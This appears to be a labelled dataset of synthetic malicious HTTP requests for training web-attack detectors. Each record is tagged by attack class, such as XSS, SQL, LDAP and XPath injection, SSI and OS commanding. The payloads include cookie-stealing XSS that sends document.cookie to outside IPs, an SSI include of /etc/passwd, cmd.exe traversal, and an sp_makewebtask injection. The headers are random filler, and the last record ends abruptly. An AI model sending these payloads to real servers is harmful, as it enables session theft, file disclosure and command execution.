X-Forwarded-For: 229.251.127.187
X-Serial-Number: 729426151535484
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39292
Start - Id: 47192
class: XSS
GET /ostoi6/m6N6s/_abiframehd8YQkDb5Pj/7t/gdeh5/nK9hmApO/0w/aqwuqhEGEunion.jpg?thcmihIas=utGs3connect8ru2hr&FXEusrCF=oNaupescka&sTudmwlIger6f=394040&me4Hictnmrk=tnfd%5Da%3B%28+%5Bga&wreNeap9prsaoe=elnsitems4d&TtxrhLkzsicd=%5Cah%3Apopt%5Deodc&89bMBc=%3C%21%5BCDATA%5B%3C%21--%5D%5D%3E%3Cscript+%3E%5Balert++%28%27iIevsie%27%29%3B%5D%2F%2F--%3E%3C%2Fscript+++%3E&1siaef7nR2x=0d4O3d-+aboot.inioiunion&iipme0Iihocen=5726686362&nmrhbec=e+a7hfb HTTP/1.1
Host: www.7uxe.uk:80
Connection: keep-alive
Accept: video/*, video/mpeg;q=0.9, text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: atrsklIr-aje, rdsct-j
Cache-Control: only-if-cached
Client-ip: 34.140.216.85
Cookie: otgrilntuhuEe=oev;evalinjpOgy=724
Cookie2: $Version="81"
Date: Fri, 16 Jun 06 16:22:15 UTC
ETag: W/"M.D_V9Hhyz7aLO5"
Expect: ge5it=aiet
From: 7wria@hsclhu.org
If-Modified-Since: Sat, 12 Dec 09 14:37:03 UTC
If-Unmodified-Since: Sat, 16 Sep 06 22:49:57 UTC
If-Match: "RRAglu8YSeaNw1b6Zc@C"
If-None-Match: *
If-Range: *
Max-Forwards: 9840
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: n0ntl bt2Ndpz=9yldlwu
Authorization: Digest realm
Range: 671-463
Referer: http://www.tLrdewr.it/cnfne7w.cfm
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: lsZk6C http://www.1atei.org
UA-CPU: 68000
UA-Disp: 934,693,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 739x565
Via: tw9f/9.3 6.85.199.44:3144
Transfer-Encoding: deflate
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 25.149.50.16
X-Serial-Number: 533969856895
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47192
Start - Id: 37628
class: LdapInjection
POST /cc2eoetrthaI/letacunyteiceol5/t7VVhXDz8Xkt2uuBM6t/p_-QEr/fbNf8sTs/os/eZu8-m5RRiz/owhsapuil69er5rt/hs/nYformfzb/sepece2ezlT66te9.tiff? HTTP/1.1
Content-Length: 164
Content-Language: ah1aun46,eivp7O
Content-Encoding: identity
Content-Location: http://eyluir.it/na74ihM.png
Content-MD5: NGFtMnJvb3NuZXdnanVldQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Jun 08 18:04:36 GMT
Last-Modified: Tue, 27 Jul 04 09:11:38 GMT
Host: 131.208.15.175
Connection: Csezt9ni
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, gzip
Accept-Language: nhuAj-eiuqh;q=0.2, it-F4gz
Cache-Control: no-cache
Client-ip: 236.109.120.226
Cookie: unionmochaIdMJU0position=+ipsoew>0t2ecAr;ebrofte25atv=9OaI
Cookie2: $Version="477"
Date: Mon, 13 Sep 04 18:05:42 UTC
ETag: "UasEgXZAUoa8Yhw8"
Expect: 100-continue
From: eVgdo@tlh3.net
If-Modified-Since: Fri, 01 Jul 05 04:32:49 UTC
If-Unmodified-Since: Sat, 24 Dec 05 03:52:41 CET
If-Match: "bhbbKh8reMkrOEpvhI3q"
If-None-Match: *
If-Range: Sat, 22 May 04 11:16:44 GMT
Max-Forwards: 60
MIME-Version: 4.3
Pragma: ta5='Esntprns'
Proxy-Authorization: Digest username="pitaah"
Authorization: Basic QWFvZzptUmFwZGk=
Range: -6153,297-,439-473
Referer: http://www.tw2zcel.be/etr5vh1t.aspx
TE: trailers,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/3.8 (Machintosh; U; PPC Mac OS X 5.5; ae-hi; rv:4.3.6) Gecko/04035848
UA-CPU: MIPS
UA-Disp: 2548,1743,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4356x362
Via: HTTP/1.3 www.fnbnled.js, 3.7 247.245.41.81
Transfer-Encoding: gzip
Upgrade: 1obltA/1.6, begaf/4.9, aje/5.5
Warning: 290 www.csV7.jpg "alupzEldm3wn" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fsai=3611&pEc=87&FoASdEd=)(|(cn=*o  'brien*   )(mail   =*o 'brien*)&h6otsr=103516&qeftbrmoAocech=27677184&aItjb=t''eb1i&hisz3inecar2nq=541

End - Id: 37628
Start - Id: 47626
class: XSS
GET /tteSAI8A/dxSS9Ho./aBb7GR0r.4HEX3/heOoRrli/tGKmF_o.giVS1A8Mp/c5ZqpjtGRRuvc/m0K/uNnedtnle2naxNuttaor/tca8rn7oiaer.exe?edst2e=gefi8sRh4&k1wgm=%3Cimg+++++src+++%3D%22+++++ietiri%22onmouseover+++%3D+++%22+++%5Bwindow.open%28%27http%3A%2F%2F243.205.129.77%2Fsedeli.jsp%27%2Bdocument.cookie%29%3B%5D++%22+%3E&muvo=etoroioelwcofeUntO&0yG41=vMIn8XE3igFK HTTP/1.1
Host: www.amIhaaoa.org
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-2022-kr;q=0.8, big5, isiri-3342
Accept-Encoding: *
Accept-Language: aspt7tt-6oeb;q=0.4, t-fe1
Cache-Control: no-store
Client-ip: 58.158.9.220
Cookie: nhem96d= 6;tmSaa7hsorrac=6131197;e2hdotj1LdSet=o2JS3kK;asngs4sI=d4kperl0;l2=od
Cookie2: $Version="58"
Date: Sat, 24 Jan 04 23:35:48 GMT
ETag: W/"h1nKfSruLg2mDIS"
Expect: 100-continue
From: drEnA@edtwavoDoa.com
If-Modified-Since: Sat, 17 May 08 18:23:49 CET
If-Unmodified-Since: Mon, 19 Feb 07 09:59:49 GMT
If-Match: "WZxAhekJ3qSwjf5"
If-None-Match: "BAnmKkNBk6xqA4BRi"
If-Range: "TpNlc2@.p.bShmWk3j"
Max-Forwards: 294
MIME-Version: 5.8
Pragma: Yi0eeina='xIphsatb'
Proxy-Authorization: Digest cnonce="femknga"
Authorization: NTLM c2xld3poM2ZlYXBkYU9vcm9udG9hd3Bpcnhlc2VycWdJYmF0dGlhc25sYVNk
Range: 545-82205,788-76233
Referer: /nhnmrnaa/e7todcEj/ozsnteau.jpg
TE: trailers,gzip,trailers
Trailer: Expect
User-Agent: Mozilla/6.8 (X11; U; Linux i386 1.2; s9-re; rv:1.3.6) Gecko/53195114
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 608x141
Via: 7.2 150.9.181.7:334, ntebs/7.2 201.36.31.28, 3.1 www.st5sthlr.gif
Transfer-Encoding: gzip
Upgrade: eok7ht/3.9, 9eex4/3.3
Warning: 297 www.hzbts.tiff "tresi" "Wed, 25 Apr 07 19:25:41 CET"
X-Forwarded-For: 119.112.244.238
X-Serial-Number: 2524902769036083814
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47626
Start - Id: 39663
class: SSI
GET /ej/ek@cOMT/pNkRrVl/--4XA4N/bscriptDm8LXinput.jpg?ou2c=oY5g%40lzt-T&lIIE=htb&T0dPXOF5JH=Uiperlrbodyiase7el&ic8ltOt9d=detlos&atm7eeo=%3C%21--%23include+virtual%3D%22%2Fetc%2Fpasswd%22+--%3E&ucln1=Eawuxtermvae8ofha%3Aq&aslo5azs1baewi=tehTc9efj&llovshrRl5=tO9mjMvu&nhh4Tt=aL&tofwk=e++%7Enwt&lue=imefdfoobajR&cyn8AdoanN89ari=lTBicgeqte&diTS3qbeimeaOe=cGSpF&tbqnPyea=b3Thqa1kiuzo HTTP/1.1
Host: 70.72.139.176
Connection: adeolnk
Accept: */*
Accept-Charset: iso-8859-1, hz-gb-2312;q=0.3, iso-8859-8-i;q=0.6
Accept-Encoding: 
Accept-Language: r-CrteEior;q=0.4, cy-ge, eifm-p;q=0.7
Cache-Control: min-fresh=9228
Client-ip: 51.157.12.104
Cookie: T_3UgY=iva ;iaee=b5Wa;rp8scoxb=5966;on=tb 2a3ddmdx4zH;onninAx=5482205783;stvrsr8=pbinhssbin 
Cookie2: $Version="811"
Date: Tue, 05 Jun 07 13:04:50 CET
ETag: W/"DjzoEKQNI9ad3TMI8QLe"
Expect: bOXslStq
From: l5vtEst@R8caTefna.fr
If-Modified-Since: Wed, 09 Feb 05 13:16:29 CET
If-Unmodified-Since: Sun, 17 Jul 05 13:38:19 GMT
If-Match: "B@3VoxY.xDKOy5mo"
If-None-Match: "G7ifQuf7D1dgv_5QN6"
If-Range: *
Max-Forwards: 9439
MIME-Version: 3.9
Pragma: a=yboSa
Proxy-Authorization: Digest opaque="mwba"
Authorization: Basic YnRlczpuc29lcGNlMg==
Range: -7190
Referer: /shlhnelv/dcareAo.cfm
TE: trailers,trailers,chunked
Trailer: Accept-Language
User-Agent: Mozilla/3.7 (Machintosh; U; PPC Mac OS X 2.0; oI-tt; rv:1.6.1) Gecko/38596855
UA-CPU: PowerPC
UA-Disp: 9927,407,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8969x195
Via: 1.0 www.oOl2.tiff
Transfer-Encoding: identity
Upgrade: keeao/1.8, ytF/7.1
Warning: 273 www.Sneje.htm "srzSNAitebchch" "Mon, 20 Dec 04 23:29:19 UTC"
X-Forwarded-For: 50.214.174.78
X-Serial-Number: 659531112
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39663
Start - Id: 43921
class: OsCommanding
GET /cgi-local/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: 237.104.154.53
Connection: keep-alive
Accept: image/*, image/jpeg;q=0.2
Accept-Charset: gb2312, euc-cn;q=0.6, koi8;q=0.9, us-ascii
Accept-Encoding: *;q=0.5
Accept-Language: se1wqsa-7nmlldb6, h6clog-diini, hla-steEi;q=0.4, ofwa-fonlqg
Cache-Control: no-store
Client-ip: 22.30.133.135
Cookie: ti8oldhg=ndq;oet0=6767318;mdgtpsu9=ongriGolibqis8ee
Cookie2: $Version="50"
Date: Thu, 19 May 05 08:23:03 UTC
ETag: W/"vie1Rh-65y4FyKK@u97g"
Expect: 100-continue
From: nehsxlsR@ou1hri.fr
If-Modified-Since: Thu, 27 Jan 05 17:52:30 GMT
If-Unmodified-Since: Tue, 09 Aug 05 13:15:15 CET
If-Match: "wUYpfCXl6otd5uZX"
If-None-Match: *
If-Range: Sun, 17 Dec 06 16:19:22 CET
Max-Forwards: 54
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic dEFlNm1kMDpoZE9k
Authorization: i6h6 inyEtSLs=s0eHnr
Range: 6652-,-36477,66590-93
Referer: http://www.sbsT.gov/3Yath/iyhTin7s.cgi
TE: gzip;q=0.5
Trailer: Expect
User-Agent: Mozilla/3.2 (X11; U; Solaris 3.3; ro-ea; rv:2.8.5) Gecko/53813436
UA-CPU: StrongARM
UA-Disp: 527,703,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 428x0275
Via: 4.3 18.7.121.254, FTP/7.5 233.118.60.9, FTP/1.0 www.dySlaw9o.html:8629
Transfer-Encoding: 3pir; riee=oetd
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 175 www.izidyp.gif "ortoaehswe5tr" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43921
Start - Id: 38705
class: LdapInjection
GET /scuo/tcnheetr2tdyrp/i3w5uet3ee3hieeudNt/window.openeJRfevalQbody7tO/owNureupenfibeniesu.php?evpshn6tieeewI4=3843%29%28%26%28objectClass%3Dcesc%29%28%7C%28sn++%3D+++eh%29%28cn%3DaOta+J*%29%29 HTTP/1.1
Host: www.81orob.gov
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 244.26.7.222
Cookie: haosmgdjnun=2Sgeisdrr;sognue=4951583;yScllknitynhe=tirp8rxneeea3bva
Cookie2: $Version="4"
Date: Tue, 22 Jan 08 13:54:45 UTC
ETag: W/"PVcmfJxnkWU@I6@XHg8W"
Expect: rsracoa
From: lLzaagE6@8ctXe4aie.gov
If-Modified-Since: Sat, 21 Feb 09 07:31:23 CET
If-Unmodified-Since: Thu, 19 Mar 09 21:59:15 CET
If-Match: "98Fjs4vs5yXbPmVy"
If-None-Match: *
If-Range: Thu, 31 Aug 06 09:08:23 UTC
Max-Forwards: 1383
MIME-Version: 5.4
Pragma: 09ws='I0o'
Proxy-Authorization: e7fkmh dlnen=ue3t2
Authorization: NTLM dG5zUG5ycmlhdGl3ZW1scnR0Z3RoZXRyb2tqbGVEdGhhdHRlZTA3aVRyZXBFcjk=
Range: 557810-
Referer: /eaejng/damTwEiR/tcnlpwee.html
TE: deflate;q=0.3,trailers,trailers
Trailer: If-Modified-Since
User-Agent: dV@8zsY5aY http://www.AoDS.uk
UA-CPU: PowerPC
UA-Disp: 849,080,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 094x3377
Via: HTTP/5.9 70.13.203.61
Transfer-Encoding: compress
Upgrade: xorad/3.4, wEIe/7.5, ten/7.9, acen/0.3
Warning: 442 77.207.105.249 "n0tcfehentkl" 
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 639971936783
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38705
Start - Id: 48330
class: XPathInjection
GET /vp1nQ/3oFEu6styleroQinsertCM/7ugddrnAryet9pQaoi.jpeg?nte=d.L4xQeszbaj&2qrt7whtkr=iyt4l1Tsz7TFs&lZnk=etce%24dc5jtmnd+f+sUsam&n8i=eioris37otl&htaccesGwCymyreplace=eeeedrdw%3E&etnDhtmyaeatsln=ax&s7sutucesrdi=74685 HTTP/1.0
Host: www.qjnjqa.ch
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 5td-aotftol;q=0.4
Cache-Control: no-cache
Client-ip: 4.209.163.190
Cookie: jh=bodyoeF6z8neadminld;uttNxbdtrhcgs=O3wgetg rdor
Cookie2: $Version="1"
Date: Sun, 18 Jan 09 03:47:10 GMT
ETag: W/"_-ZxNNysTe29xaV7"
Expect: 100-continue
From: tlgvoTUc@weaHAo.be
If-Modified-Since: Mon, 02 Feb 04 08:14:58 GMT
If-Unmodified-Since: Sun, 24 Oct 04 20:52:47 CET
If-Match: "WGP@QVTfmxu76Hi"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: dneDtg c5itec=enfiila
Authorization: k6uTh 5romeSf=izbao
Range: 8313-,-86247,250-55725
Referer: /stEvr/2Tilna/yXuWy/El4oz.tiff
TE: gzip,deflate
Trailer: If-Modified-Since
User-Agent: eEeh'   or    count(   path/child::node()[position(   )=((i +j +  k +    l    +  1)] | path/child::*()[position()=(k+1)])=1    or   'htee2ois'    =  '    Tisqan'   or
UA-CPU: Sparc
UA-Disp: 202,739,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 433x249
Via: FTP/3.6 www.dRuon.png:92499, hy7/6.9 155.37.24.54, 8.8 203.216.18.246
Transfer-Encoding: identity
Upgrade: ggwu/8.7, eaee/3.4, wiazc/3.1, tznuol/7.6, gfi/8.6
Warning: 589 97.236.200.85 "tutzsttjueassase" "Sat, 28 Mar 09 19:51:19 CET"
X-Forwarded-For: 190.33.188.59
X-Serial-Number: 278748120266538
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48330
Start - Id: 41168
class: SqlInjection
POST /reeonaeer/4KO2xpF3_StO/rFexecs3Ozax6-0M84/rr3gut/ncm.sSSq/rF2U1@C70M3Vq.cfm? HTTP/1.1
Content-Length: 22
Content-Language: t4T,l,uaori3e
Content-Encoding: deflate
Content-MD5: dHVJZUk4TXllYWNlcnZ0ZQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 09 Mar 07 06:43:06 GMT
Host: 247.118.201.13
Connection: aic26Rne
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.3, euc-jp;q=0.2, windows-1252;q=0.1, x-mac-chinesetrad;q=0.0, euc-cn;q=0.4
Accept-Encoding: 
Accept-Language: dir2ike-asfatc9s
Cookie: nlokonueaEeTrh=26;hethihoteahcS=';     EXEC    master.dbo.sp_makewebtask   'c:\inetpub\wwwroot\ststoin.shtml',   'SELECT bonu  FROM  5nkmEseB  WHERE    xtype=''U''';0euzauegg235=/a]%n;qCSs=mtUir;nsrsbiv=~(h1ifo;SY8.wIeQ6openA=7
Date: Thu, 23 Jun 05 11:18:30 CET
ETag: W/"U0Nc0oAEp6UzYwiK85M"
If-Match: *
If-None-Match: *
If-Range: Wed, 18 May 05 09:46:30 GMT
Max-Forwards: 851
MIME-Version: 9.8
Pragma: lccamd='cdoodu'
Authorization: NTLM ZmJyMWlpbm1pYWxFRW5ydHIyMXNlT21lMjFtZ3NlY0VzaXRvcm41ZGV1c2xm
Range: -6
Referer: http://7nuCr62.ch/pP9iL7i/mRrh.cgi
TE: chunked,deflate,trailers
User-Agent: h8CoQ3@H http://www.Jtnaa.gov
UA-Pixels: 313x443
Via: 3.6 118.74.174.202, 6.1 www.scfl.jpg
Transfer-Encoding: compress
Warning: 006 62.2.193.196 "yhtkanas8ghahy" "Tue, 05 Oct 04 14:39:29 UTC"

Miena0pHytmiafa=318465

End - Id: 41168
Start - Id: 47495
class: XSS
GET /eCAr.htm?hi7moWdixpes6=%3Cdiv++++style+++%3D++%22+width%3A+++++expression%28%5Bwindow.open%28%27http%3A%2F%2F160.164.65.143%2Fri.swf%27%2Bdocument.cookie%29%3B%5D%29%3B+++%22+++%3E&ninr0r=r0dux%7E&thnrnilseiTtmga=mebQ&egdiOehedytenen=553708&aKhlhap=94507 HTTP/1.1
Host: www.erwcEolh.org
Connection: keep-alive
Accept: application/*, video/mpeg
Accept-Charset: *
Accept-Encoding: gzip, gzip, deflate
Accept-Language: *
Cache-Control: max-stale=3
Client-ip: 229.228.100.156
Cookie: auoeidnoTtyle9S=ka(l6reh
Cookie2: $Version="037"
Date: Sat, 13 Mar 10 13:02:19 GMT
ETag: "Fp1oJVXIDfwd1iWhR"
Expect: 100-continue
From: hD4h@iejie.gov
If-Modified-Since: Fri, 21 Jan 05 04:30:17 GMT
If-Unmodified-Since: Sun, 10 Dec 06 23:13:07 CET
If-Match: *
If-None-Match: "-d7mEccy.PWPKU7xY"
If-Range: Mon, 16 May 05 03:36:15 UTC
Max-Forwards: 9799
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic aXJvZXA6Y3NlYWFyYg==
Authorization: NTLM aWVxcDJhdDdkc2RhZWVkaFM3YTBkeW5sZmc5bG1wcHl1RWlvZW9tc25sZQ==
Range: 9183-933,-0
Referer: http://3mroe.de/z3aomn.rar
TE: gzip,gzip;q=0.2
Trailer: Authorization
User-Agent: Mozilla/0.4 (Machintosh; U; PPC 7.0; 3n-9E; rv:6.5.9) Gecko/06741584
UA-CPU: x86
UA-Disp: 612,9205,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 206x914
Via: HTTP/9.4 www.ejrn.htm:2, 1sr/9.7 www.drulhe.jpeg:1312, nemoo/7.5 201.208.252.6
Transfer-Encoding: identity
Upgrade: mrsd/9.5, owur/3.3
Warning: 377 www.ttf1aee.tiff:8 "utk7eeufto6reia" "Thu, 23 Jul 09 20:34:19 CET"
X-Forwarded-For: 121.171.235.172
X-Serial-Number: 48112496441051
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47495
Start - Id: 38147
class: LdapInjection
GET /oiTczfoailtrnetgH/Mtn1wlicagd4dni/mN8nzCntbawaigid1/dOqOt4dcg4i8Ibzyh/h9/HExaK-/sk2oaoerUncnonaHnntu/aEQvu.jpg?4hu63a5pnivaT4=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&rettf=g+20as2twe1e2+&jalsiepcegybbfh=ynmeta%2Fpla&idu=jyU7EYOgobX&os08f5ad3eoonog=4v&irgsee=eue0&irhrihsdndqkd=5 HTTP/1.1
Host: www.efieei.ch
Connection: close
Accept: */*
Accept-Charset: windows-1253;q=0.3, koi8-r, isiri-3342, windows-1257;q=0.1, x-mac-japanese
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: ypixty=ieexxoc
Client-ip: 91.30.161.167
Cookie: E6dke_A_U=06716;betweenscript5andV7F60=430511;1N=etwtHsenel1irTc;nreo1hs=etIecgo9atCeia
Cookie2: $Version="16"
Date: Sun, 26 Jun 05 09:01:08 CET
ETag: "Ptct44HXIkgtS5In"
Expect: 100-continue
From: 7enqeIo@sjtoi.net
If-Modified-Since: Wed, 26 Apr 06 21:48:12 GMT
If-Unmodified-Since: Sat, 20 Dec 08 01:21:46 CET
If-Match: "N3cqanTivdrDhLZxH"
If-None-Match: "yE5A4_VNrFoYm_2TQ"
If-Range: Mon, 20 Sep 04 06:04:07 UTC
Max-Forwards: 68
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Basic YWVhbjplamVlY2hjbg==
Authorization: NTLM YWVlcnE4cnR2RWF0dDU1cW9ocmltMEF0aGVoc1JlbHNudGRhVGpz
Range: 652463-080254,-92,5914-088
Referer: http://7M5hipt.st/t5tnX.php4
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.6 (X11; U; Linux i586 5.1; ut-r2; rv:8.2.8) Gecko/10137959
UA-CPU: StrongARM
UA-Disp: 651,9493,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 9560x3335
Via: FTP/2.3 www.aie5e.js:0162, FTP/0.4 239.196.125.92:728
Transfer-Encoding: dgxp2s
Upgrade: tfcsu/8.0, late/9.1, 9vp6/5.4, h2zo/6.8, hai3pl/9.2
Warning: 953 www.rhr1crat.jpeg "ndt4er0lwh7ihen2iO" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38147
Start - Id: 38157
class: LdapInjection
GET /3Mrla.8Iocjre-7GX/t8tewnhddusUortei/positionxterm6wPTzwgetsx_vc/ISoMClpR4/tuYImuFfOVzxQg/ibi/aAJzZ3OQmMwySbZCBPAo.htm?etcs7tbd=849&Zsme5owegosnt=%29++++%28++++%7C+%28++cn%3D*o%27brien*++%29%28mail+%3D*o++++%27brien*++%29++&7o3htusaeShnoom=6913707 HTTP/1.0
Host: www.bSPe.cz
Connection: ntlrrw
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=86
Client-ip: 244.206.103.244
Cookie: ceds=nzCoq;oh5irdt35ln5um=trst;7aser2=ee%u7a;zoTxzdmedpEr=7976849487;fkioa1acqsk2toS=c<croimeTh
Cookie2: $Version="2"
Date: Thu, 18 Mar 10 24:33:48 UTC
ETag: W/"oYZOAXe-lop@UENF"
Expect: 100-continue
From: 7enqeIo@sjtoi.net
If-Modified-Since: Tue, 08 Jun 04 07:47:06 UTC
If-Unmodified-Since: Sat, 31 Jan 09 14:48:21 CET
If-Match: "IRWVsObenByGIye0hs8"
If-None-Match: *
If-Range: Wed, 19 Mar 08 20:00:20 UTC
Max-Forwards: 005
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: vanc 8esln=eenorc9
Authorization: njtdo oiaHAsOe=InaIstei
Range: 6-624,5616-9,-29
Referer: /new8/bhuiI9o/eOi7.mdb
TE: gzip,gzip;q=0.4
Trailer: Proxy-Authorization
User-Agent: lrtze1u
UA-CPU: StrongARM
UA-Disp: 311,524,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9560x3335
Via: 1.6 116.31.74.204:8175, 5.7 185.107.59.153
Transfer-Encoding: deflate
Upgrade: eeu/8.8, fSe7/3.7, nho/6.1, rqw/6.3, SLsti/8.0
Warning: 967 www.teLieti.js "bUr2" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38157
Start - Id: 38932
class: LdapInjection
GET /oaeaoowcrtnhlgh6oz/eZWmy.asp?tute=nph-tt&iesOstS=w0%7Cxp_rw%7E%7Eo++&atLcBoSsa33B=z5pQTT8E0O&po4=99451&fsQe5binide=hers&mEasss3ttilc=roXDbRvu&79oxeeel6=3625%29%28%26%28objectClass%3DRasi%29%28%7C%28sn+%3D+++mrno%29%28cn%3Drroe+++J*%29%29&i1k8rerr=8lhrs3ddt49&rs07=gcm7enve%7Ceae&nsne8e=969 HTTP/1.0
Host: www.daOl.org:19
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: m4iUate-eofs2Ts;q=0.1
Cache-Control: ebee='enecc'
Client-ip: 200.234.213.150
Cookie: ueinl03=etctttN;eehfoeejeb6k=d(sbch;qoies19tt=tzuKZTt4u-GJ;av9ltiAtt8me=eeeuEbht;5ehhioettsbr=pis;ndselnsmtet=bm6?wuqvar
Cookie2: $Version="0"
Date: Mon, 03 Jan 05 11:16:18 CET
ETag: W/"TYMOMZ2kAitjz9Jj"
Expect: 100-continue
From: Utnn8c@iodssieo.biz
If-Modified-Since: Sun, 30 Jan 05 13:50:27 GMT
If-Unmodified-Since: Thu, 19 Oct 06 20:44:18 CET
If-Match: *
If-None-Match: "BiMXICoHQdTSHQ0_R"
If-Range: *
Max-Forwards: 9624
MIME-Version: 8.7
Pragma: nEene='mge'
Proxy-Authorization: NTLM NGloNUVlOER0YWFvb2dlMHRBZnZuR3RlczZodDJkaWVoc0Ruc2I=
Authorization: NTLM OW5kOXl0YXNtaFdpaG90ekx3RnQzdWtsZHE0cnZFSXROZWJka24xbXNvZ25yZQ==
Range: 272257-3
Referer: /nf1orin6/stnT8ns.exe
TE: trailers,gzip;q=0.4
Trailer: If-Unmodified-Since
User-Agent: hPXxVdfwo http://www.td8rndzm.biz
UA-CPU: Sparc
UA-Disp: 8172,5109,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 024x188
Via: 4.0 www.Mehhis.js:0005
Transfer-Encoding: deflate
Upgrade: mneSso/4.0, Ean/1.8
Warning: 490 107.236.240.80 "Ol4tn7eejtras" "Mon, 14 Jun 04 07:29:54 UTC"
X-Forwarded-For: 212.86.228.108
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38932
Start - Id: 35535
class: XPathInjection
PUT /0qe/tX@RKiMguFEXQ/Ib/2PjDoWr9gW@OmpMF@/uh/DRqsystem/gfssbEet9Csleottun.jpg? HTTP/1.0
Content-Length: 280
Content-Language: shlo,rjee,ue
Content-Encoding: identity
Content-Location: /idom.jpeg
Content-MD5: Y2VlbGFhb2VlbnI2aG1paQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Mar 09 04:20:16 UTC
Last-Modified: Mon, 13 Mar 06 06:07:47 UTC
Host: www.leliu.be
Connection: Ecahxo
Accept: */*
Accept-Charset: utf-8, x-mac-arabic;q=0.5
Accept-Encoding: gzip, deflate;q=0.2
Accept-Language: *;q=0.9
Cache-Control: max-stale=73716
Client-ip: 106.66.65.58
Cookie: oycrtrcgortE=825;inqcltvhltb59=aeHm0XqPdX
Cookie2: $Version="80"
Date: Mon, 25 Jul 05 24:49:13 GMT
ETag: W/"nTFrm6Ac_m@v9GKXfJ4n"
Expect: jeseiyqo=oozs
From: ddsory@ail3hIue.st
If-Modified-Since: Sun, 20 Jan 08 13:06:43 UTC
If-Unmodified-Since: Sat, 20 May 06 19:30:49 GMT
If-Match: "6eCNHQzjAurm-N8pVwI7"
If-None-Match: *
If-Range: *
Max-Forwards: 50
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic dnVhN3M6bnByMmE=
Range: 7-26018,971548-,-1
Referer: http://eeta.uk/eemnJa/iugT/aiita.mpg
TE: trailers,chunked
Trailer: Host
User-Agent: nn0aozsD
UA-CPU: 68000
UA-Disp: 740,794,8
UA-Pixels: 502x021
Via: FTP/5.6 255.138.9.226
Transfer-Encoding: identity
Upgrade: hs1gw/0.3, rdt/3.0
Warning: 074 www.hio17hmp.gif "oloAfT" 
X-Forwarded-For: 73.71.14.52
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

7kanotaeytaPas=595415337&ivOYor.Z=994444&t5eor=iii2en'  or count( path/child::node()[position()=((    i   +  j    +k    +l   +   1)] |  path/child::*()[position()=(k+1)])=1 or   'iAu'= ' ptetole'   or

End - Id: 35535
Start - Id: 44280
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.1
Host: 17.156.202.215
